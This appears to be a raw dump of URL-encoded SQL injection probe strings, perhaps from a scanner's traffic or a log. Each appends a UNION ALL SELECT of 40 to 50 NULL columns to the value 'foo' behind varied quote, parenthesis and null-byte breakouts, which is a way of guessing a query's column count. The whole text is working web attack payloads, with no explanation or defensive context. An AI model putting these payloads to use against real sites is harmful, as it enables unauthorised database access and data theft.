foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%205888%3D5888%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%203892%3D3892%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%208137%3D8137%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%204231%3D4231%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%204969%3D4969%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%201748%3D1748%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%208615%3D8615%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%201846%3D1846%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%209687%3D9687%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%204589%3D4589%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%209248%3D9248%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%202819%3D2819%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%205469%3D5469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%207019%3D7019%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%202886%3D2886%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%208944%3D8944%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%208592%3D8592%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%209764%3D9764%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%208149%3D8149%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%209169%3D9169%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%203896%3D3896%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%201788%3D1788%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%204653%3D4653%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%209555%3D9555%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%208995%3D8995%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%202956%3D2956%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%204382%3D4382%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%205138%3D5138%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%207658%3D7658%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%206321%3D6321%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%201596%3D1596%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%207831%3D7831%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%206708%3D6708%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%205176%3D5176%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%203077%3D3077%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%206579%3D6579%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%203175%3D3175%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 